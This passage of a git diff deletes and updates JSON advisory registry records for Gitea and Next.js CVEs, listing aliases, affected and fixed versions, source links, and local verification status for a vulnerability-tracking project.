-  "cvss_score": null,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/advisories/GHSA-hf6f-jq25-8gq9",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2018-18926",
-    "https://github.com/go-gitea/gitea/commit/aeb5655c25053bdcd7eee94ea37df88468374162",
-    "https://github.com/go-gitea/gitea/issues/5140",
-    "https://github.com/go-gitea/gitea/pull/5177"
-  ],
-  "aliases": [
-    "CVE-2018-18926",
-    "GHSA-hf6f-jq25-8gq9",
-    "GO-2022-0844"
-  ],
-  "cve_ids": [
-    "CVE-2018-18926"
-  ],
-  "ghsa_ids": [
-    "GHSA-hf6f-jq25-8gq9"
-  ],
-  "osv_ids": [
-    "GO-2022-0844"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<1.5.2"
-  ],
-  "fixed_versions": [
-    "1.5.2"
-  ],
-  "package_name": "code.gitea.io/gitea",
-  "render_markdown": true,
-  "case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Gitea"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2019-1010261.json b/08-threat-intel/registry/advisories/gitea--CVE-2019-1010261.json
deleted file mode 100644
index 3899adbf..00000000
--- a/08-threat-intel/registry/advisories/gitea--CVE-2019-1010261.json
+++ /dev/null
@@ -1,73 +0,0 @@
-{
-  "canonical_id": "gitea--CVE-2019-1010261",
-  "system_id": "gitea",
-  "display_name": "Gitea",
-  "category": "platforms",
-  "advisory_mode": "core",
-  "title": "Gitea XSS Vulnerability in code.gitea.io/gitea",
-  "summary": "Gitea XSS Vulnerability in code.gitea.io/gitea",
-  "published_at": "2024-08-20T20:31:38Z",
-  "updated_at": "2026-03-03T04:53:57.848904Z",
-  "severity": "unknown",
-  "cvss_score": null,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/advisories/GHSA-5rh7-6gfj-mc87",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2019-1010261",
-    "https://github.com/go-gitea/gitea/pull/5905"
-  ],
-  "aliases": [
-    "CVE-2019-1010261",
-    "GHSA-5rh7-6gfj-mc87",
-    "GO-2023-1922"
-  ],
-  "cve_ids": [
-    "CVE-2019-1010261"
-  ],
-  "ghsa_ids": [
-    "GHSA-5rh7-6gfj-mc87"
-  ],
-  "osv_ids": [
-    "GO-2023-1922"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<1.7.1"
-  ],
-  "fixed_versions": [
-    "1.7.1"
-  ],
-  "package_name": "code.gitea.io/gitea",
-  "render_markdown": true,
-  "case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "proxy-trust-boundary",
-    "xss-output-encoding"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "xss-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Gitea"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2020-13246.json b/08-threat-intel/registry/advisories/gitea--CVE-2020-13246.json
deleted file mode 100644
index 07493b82..00000000
--- a/08-threat-intel/registry/advisories/gitea--CVE-2020-13246.json
+++ /dev/null
@@ -1,75 +0,0 @@
-{
-  "canonical_id": "gitea--CVE-2020-13246",
-  "system_id": "gitea",
-  "display_name": "Gitea",
-  "category": "platforms",
-  "advisory_mode": "core",
-  "title": "Denial of Service in Gitea in code.gitea.io/gitea",
-  "summary": "Denial of Service in Gitea in code.gitea.io/gitea",
-  "published_at": "2024-08-21T15:29:04Z",
-  "updated_at": "2026-03-03T04:52:17.939867Z",
-  "severity": "unknown",
-  "cvss_score": null,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/advisories/GHSA-g2qx-6ghw-67hm",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2020-13246",
-    "https://github.com/go-gitea/gitea/issues/10549",
-    "https://github.com/go-gitea/gitea/pull/11438",
-    "https://www.youtube.com/watch?v=DmVgADSVS88"
-  ],
-  "aliases": [
-    "BIT-gitea-2020-13246",
-    "CVE-2020-13246",
-    "GHSA-g2qx-6ghw-67hm",
-    "GO-2022-0830"
-  ],
-  "cve_ids": [
-    "CVE-2020-13246"
-  ],
-  "ghsa_ids": [
-    "GHSA-g2qx-6ghw-67hm"
-  ],
-  "osv_ids": [
-    "GO-2022-0830"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<1.12.0"
-  ],
-  "fixed_versions": [
-    "1.12.0"
-  ],
-  "package_name": "code.gitea.io/gitea",
-  "render_markdown": true,
-  "case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Gitea"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2021-28378.json b/08-threat-intel/registry/advisories/gitea--CVE-2021-28378.json
deleted file mode 100644
index 3fd33212..00000000
--- a/08-threat-intel/registry/advisories/gitea--CVE-2021-28378.json
+++ /dev/null
@@ -1,77 +0,0 @@
-{
-  "canonical_id": "gitea--CVE-2021-28378",
-  "system_id": "gitea",
-  "display_name": "Gitea",
-  "category": "platforms",
-  "advisory_mode": "core",
-  "title": "Cross-site Scripting in Gitea in code.gitea.io/gitea",
-  "summary": "Cross-site Scripting in Gitea in code.gitea.io/gitea",
-  "published_at": "2024-08-21T15:29:04Z",
-  "updated_at": "2026-03-03T04:52:18.307544Z",
-  "severity": "unknown",
-  "cvss_score": null,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/advisories/GHSA-g95p-88p4-76cm",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2021-28378",
-    "https://blog.gitea.io/2021/03/gitea-1.13.4-is-released",
-    "https://github.com/PandatiX/CVE-2021-28378",
-    "https://github.com/go-gitea/gitea/pull/14898",
-    "https://github.com/go-gitea/gitea/pull/14899"
-  ],
-  "aliases": [
-    "BIT-gitea-2021-28378",
-    "CVE-2021-28378",
-    "GHSA-g95p-88p4-76cm",
-    "GO-2022-0832"
-  ],
-  "cve_ids": [
-    "CVE-2021-28378"
-  ],
-  "ghsa_ids": [
-    "GHSA-g95p-88p4-76cm"
-  ],
-  "osv_ids": [
-    "GO-2022-0832"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<1.13.4"
-  ],
-  "fixed_versions": [
-    "1.13.4"
-  ],
-  "package_name": "code.gitea.io/gitea",
-  "render_markdown": true,
-  "case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "proxy-trust-boundary",
-    "xss-output-encoding"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "xss-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Gitea"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-68939.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-68939.json
deleted file mode 100644
index 164d20b9..00000000
--- a/08-threat-intel/registry/advisories/gitea--CVE-2025-68939.json
+++ /dev/null
@@ -1,74 +0,0 @@
-{
-  "canonical_id": "gitea--CVE-2025-68939",
-  "system_id": "gitea",
-  "display_name": "Gitea",
-  "category": "platforms",
-  "advisory_mode": "core",
-  "title": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
-  "summary": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
-  "published_at": "2025-12-30T01:49:57Z",
-  "updated_at": "2026-03-03T04:57:48.777563Z",
-  "severity": "unknown",
-  "cvss_score": null,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/advisories/GHSA-263q-5cv3-xq9g",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-68939",
-    "https://blog.gitea.com/release-of-1.23.0",
-    "https://github.com/go-gitea/gitea/pull/32151",
-    "https://github.com/go-gitea/gitea/releases/tag/v1.23.0"
-  ],
-  "aliases": [
-    "BIT-gitea-2025-68939",
-    "CVE-2025-68939",
-    "GHSA-263q-5cv3-xq9g",
-    "GO-2025-4261"
-  ],
-  "cve_ids": [
-    "CVE-2025-68939"
-  ],
-  "ghsa_ids": [
-    "GHSA-263q-5cv3-xq9g"
-  ],
-  "osv_ids": [
-    "GO-2025-4261"
-  ],
-  "affected_versions": [
-    "introduced=0"
-  ],
-  "fixed_versions": [],
-  "package_name": "code.gitea.io/gitea",
-  "render_markdown": true,
-  "case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2025-68939.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "proxy-trust-boundary",
-    "plugin-extension-trust-policy"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "blocked-artifact",
-  "verification_mode": "real",
-  "last_verified_at": "2026-03-17T07:02:56+00:00",
-  "last_run_id": "gitea-livecheck-20260316",
-  "evidence_bundle": "/Users/x/websafe/06-case-studies/generated-runs/gitea-livecheck-20260316",
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "file-upload-generic",
-  "artifact_mode": "official-image",
-  "blocked_reason": "unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?",
-  "metadata": {
-    "source_names": [
-      "OSV Gitea"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-68940.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-68940.json
deleted file mode 100644
index a0d17f80..00000000
--- a/08-threat-intel/registry/advisories/gitea--CVE-2025-68940.json
+++ /dev/null
@@ -1,75 +0,0 @@
-{
-  "canonical_id": "gitea--CVE-2025-68940",
-  "system_id": "gitea",
-  "display_name": "Gitea",
-  "category": "platforms",
-  "advisory_mode": "core",
-  "title": "Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea",
-  "summary": "Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea",
-  "published_at": "2025-12-30T01:49:57Z",
-  "updated_at": "2026-03-03T04:57:50.087298Z",
-  "severity": "unknown",
-  "cvss_score": null,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/advisories/GHSA-rrcw-5rjv-vj26",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-68940",
-    "https://blog.gitea.com/release-of-1.22.5",
-    "https://github.com/go-gitea/gitea/pull/32654",
-    "https://github.com/go-gitea/gitea/releases/tag/v1.22.5"
-  ],
-  "aliases": [
-    "BIT-gitea-2025-68940",
-    "CVE-2025-68940",
-    "GHSA-rrcw-5rjv-vj26",
-    "GO-2025-4267"
-  ],
-  "cve_ids": [
-    "CVE-2025-68940"
-  ],
-  "ghsa_ids": [
-    "GHSA-rrcw-5rjv-vj26"
-  ],
-  "osv_ids": [
-    "GO-2025-4267"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<1.22.5"
-  ],
-  "fixed_versions": [
-    "1.22.5"
-  ],
-  "package_name": "code.gitea.io/gitea",
-  "render_markdown": true,
-  "case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "authz-bypass-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Gitea"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2020-15242.json b/08-threat-intel/registry/advisories/nextjs--CVE-2020-15242.json
deleted file mode 100644
index 4157c87b..00000000
--- a/08-threat-intel/registry/advisories/nextjs--CVE-2020-15242.json
+++ /dev/null
@@ -1,72 +0,0 @@
-{
-  "canonical_id": "nextjs--CVE-2020-15242",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Open Redirect in Next.js versions",
-  "summary": "### Impact\n\n- **Affected**: Users of Next.js between 9.5.0 and 9.5.3 \n- **Not affected**: Deployments on Vercel ([https://vercel.com](https://vercel.com)) are not affected\n- **Not affected**: Deployments using `next export`\n\nWe recommend everyone to upgrade regardless of whether you can reproduce the issue or not.\n\n### Patches\n\nhttps://github.com/vercel/next.js/releases/tag/v9.5.4\n\n### References\n\nhttps://github.com/vercel/next.js/releases/tag/v9.5.4\n\n",
-  "published_at": "2020-10-08T19:28:07Z",
-  "updated_at": "2026-03-13T22:14:13.665535Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-x56p-c8cg-q435",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2020-15242",
-    "https://github.com/vercel/next.js",
-    "https://github.com/zeit/next.js/releases/tag/v9.5.4"
-  ],
-  "aliases": [
-    "CVE-2020-15242",
-    "GHSA-x56p-c8cg-q435"
-  ],
-  "cve_ids": [
-    "CVE-2020-15242"
-  ],
-  "ghsa_ids": [
-    "GHSA-x56p-c8cg-q435"
-  ],
-  "osv_ids": [
-    "GHSA-x56p-c8cg-q435"
-  ],
-  "affected_versions": [
-    "introduced=9.5.0, fixed<9.5.4"
-  ],
-  "fixed_versions": [
-    "9.5.4"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2024-34351.json b/08-threat-intel/registry/advisories/nextjs--CVE-2024-34351.json
index 7e488477..23cf2610 100644
--- a/08-threat-intel/registry/advisories/nextjs--CVE-2024-34351.json
+++ b/08-threat-intel/registry/advisories/nextjs--CVE-2024-34351.json
@@ -49,18 +49,18 @@
   ],
   "status": "generated",
   "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "last_verified_at": "2026-03-18T01:29:57+00:00",
+  "last_run_id": "nextjs-nextjs--CVE-2024-34351-20260318012953",
+  "evidence_bundle": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953",
   "browser_evidence": {
     "required": false,
     "present": false,
     "refs": []
   },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
+  "repro_profile_id": "nextjs-ssrf",
+  "artifact_mode": "local-fixture",
   "blocked_reason": null,
   "metadata": {
     "source_names": [
@@ -70,5 +70,7 @@
       "osv-batch"
     ],
     "candidate_count": 1
-  }
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real"
 }
diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2024-51479.json b/08-threat-intel/registry/advisories/nextjs--CVE-2024-51479.json
deleted file mode 100644
index 6a1bb62e..00000000
--- a/08-threat-intel/registry/advisories/nextjs--CVE-2024-51479.json
+++ /dev/null
@@ -1,73 +0,0 @@
-{
-  "canonical_id": "nextjs--CVE-2024-51479",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next.js authorization bypass vulnerability",
-  "summary": "### Impact\nIf a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed.\n\n### Patches\nThis issue was patched in Next.js `14.2.15` and later.\n\nIf your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version.\n\n### Workarounds\nThere are no official workarounds for this vulnerability.\n\n#### Credits\nWe'd like to thank [tyage](http://github.com/tyage) (GMO CyberSecurity by IERAE) for responsible disclosure of this issue.",
-  "published_at": "2024-12-17T15:09:06Z",
-  "updated_at": "2025-09-10T21:12:24Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2024-51479",
-    "https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b",
-    "https://github.com/vercel/next.js",
-    "https://github.com/vercel/next.js/releases/tag/v14.2.15"
-  ],
-  "aliases": [
-    "CVE-2024-51479",
-    "GHSA-7gfc-8cq8-jh5f"
-  ],
-  "cve_ids": [
-    "CVE-2024-51479"
-  ],
-  "ghsa_ids": [
-    "GHSA-7gfc-8cq8-jh5f"
-  ],
-  "osv_ids": [
-    "GHSA-7gfc-8cq8-jh5f"
-  ],
-  "affected_versions": [
-    "introduced=9.5.5, fixed<14.2.15"
-  ],
-  "fixed_versions": [
-    "14.2.15"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "authz-bypass-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-29927.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-29927.json
deleted file mode 100644
index ac734c1f..00000000
--- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-29927.json
+++ /dev/null
@@ -1,85 +0,0 @@
-{
-  "canonical_id": "nextjs--CVE-2025-29927",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Authorization Bypass in Next.js Middleware",
-  "summary": "# Impact\nIt is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware.\n\n# Patches\n* For Next.js 15.x, this issue is fixed in `15.2.3`\n* For Next.js 14.x, this issue is fixed in `14.2.25`\n* For Next.js 13.x, this issue is fixed in 13.5.9\n* For Next.js 12.x, this issue is fixed in 12.3.5\n* For Next.js 11.x, consult the below workaround.\n\n_Note: Next.js deployments hosted on Vercel are automatically protected against this vulnerability._\n\n# Workaround\nIf patching to a safe version is infeasible, we recommend that you prevent external user requests which contain the `x-middleware-subrequest` header from reaching your Next.js application.\n\n## Credits\n\n- Allam Rachid (zhero;)\n- Allam Yasser (inzo_)",
-  "published_at": "2025-03-21T15:20:12Z",
-  "updated_at": "2026-03-04T15:06:29.993197Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-29927",
-    "https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2",
-    "https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48",
-    "https://github.com/vercel/next.js",
-    "https://github.com/vercel/next.js/releases/tag/v12.3.5",
-    "https://github.com/vercel/next.js/releases/tag/v13.5.9",
-    "https://security.netapp.com/advisory/ntap-20250328-0002",
-    "https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware",
-    "http://www.openwall.com/lists/oss-security/2025/03/23/3",
-    "http://www.openwall.com/lists/oss-security/2025/03/23/4"
-  ],
-  "aliases": [
-    "CVE-2025-29927",
-    "GHSA-f82v-jwr5-mffw"
-  ],
-  "cve_ids": [
-    "CVE-2025-29927"
-  ],
-  "ghsa_ids": [
-    "GHSA-f82v-jwr5-mffw"
-  ],
-  "osv_ids": [
-    "GHSA-f82v-jwr5-mffw"
-  ],
-  "affected_versions": [
-    "introduced=13.0.0, fixed<13.5.9",
-    "introduced=14.0.0, fixed<14.2.25",
-    "introduced=15.0.0, fixed<15.2.3",
-    "introduced=12.0.0, fixed<12.3.5"
-  ],
-  "fixed_versions": [
-    "13.5.9",
-    "14.2.25",
-    "15.2.3",
-    "12.3.5"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "real",
-  "last_verified_at": "2026-03-17T06:30:47+00:00",
-  "last_run_id": "nextjs-nextjs--CVE-2025-29927-20260317063047",
-  "evidence_bundle": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2025-29927-20260317063047",
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "authz-bypass-generic",
-  "artifact_mode": "official-source",
-  "blocked_reason": "dry-run only",
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-49826.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-49826.json
deleted file mode 100644
index 795fa79b..00000000
--- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-49826.json
+++ /dev/null
@@ -1,75 +0,0 @@
-{
-  "canonical_id": "nextjs--CVE-2025-49826",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next.JS vulnerability can lead to DoS via cache poisoning ",
-  "summary": "### Summary\nA vulnerability affecting Next.js has been addressed. It impacted versions 15.0.4 through 15.1.8 and involved a cache poisoning bug leading to a Denial of Service (DoS) condition.\n\nUnder certain conditions, this issue may allow a HTTP 204 response to be cached for static pages, leading to the 204 response being served to all users attempting to access the page\n\nMore details: [CVE-2025-49826](https://vercel.com/changelog/cve-2025-49826)\n\n## Credits\n- Allam Rachid [zhero;](https://zhero-web-sec.github.io/research-and-things/)\n- Allam Yasser (inzo)",
-  "published_at": "2025-07-03T21:14:48Z",
-  "updated_at": "2025-07-03T21:49:52Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-67rr-84xm-4c7r",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-49826",
-    "https://github.com/vercel/next.js/commit/16bfce64ef2157f2c1dfedcfdb7771bc63103fd2",
-    "https://github.com/vercel/next.js/commit/a15b974ed707d63ad4da5b74c1441f5b7b120e93",
-    "https://github.com/vercel/next.js",
-    "https://github.com/vercel/next.js/releases/tag/v15.1.8",
-    "https://vercel.com/changelog/cve-2025-49826"
-  ],
-  "aliases": [
-    "CVE-2025-49826",
-    "GHSA-67rr-84xm-4c7r"
-  ],
-  "cve_ids": [
-    "CVE-2025-49826"
-  ],
-  "ghsa_ids": [
-    "GHSA-67rr-84xm-4c7r"
-  ],
-  "osv_ids": [
-    "GHSA-67rr-84xm-4c7r"
-  ],
-  "affected_versions": [
-    "introduced=15.0.4-canary.51, fixed<15.1.8"
-  ],
-  "fixed_versions": [
-    "15.1.8"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-55173.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-55173.json
deleted file mode 100644
index ab8f2391..00000000
--- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-55173.json
+++ /dev/null
@@ -1,76 +0,0 @@
-{
-  "canonical_id": "nextjs--CVE-2025-55173",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next.js Content Injection Vulnerability for Image Optimization",
-  "summary": "A vulnerability in **Next.js Image Optimization** has been fixed in **v15.4.5** and **v14.2.31**. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery.\n\nAll users relying on `images.domains` or `images.remotePatterns` are encouraged to upgrade and verify that external image sources are strictly validated.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-55173)",
-  "published_at": "2025-08-29T21:59:55Z",
-  "updated_at": "2026-02-04T04:35:34.538107Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-55173",
-    "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd",
-    "https://github.com/vercel/next.js",
-    "https://vercel.com/changelog/cve-2025-55173",
-    "http://vercel.com/changelog/cve-2025-55173"
-  ],
-  "aliases": [
-    "CVE-2025-55173",
-    "GHSA-xv57-4mr9-wg8v"
-  ],
-  "cve_ids": [
-    "CVE-2025-55173"
-  ],
-  "ghsa_ids": [
-    "GHSA-xv57-4mr9-wg8v"
-  ],
-  "osv_ids": [
-    "GHSA-xv57-4mr9-wg8v"
-  ],
-  "affected_versions": [
-    "introduced=0.9.9, fixed<14.2.31",
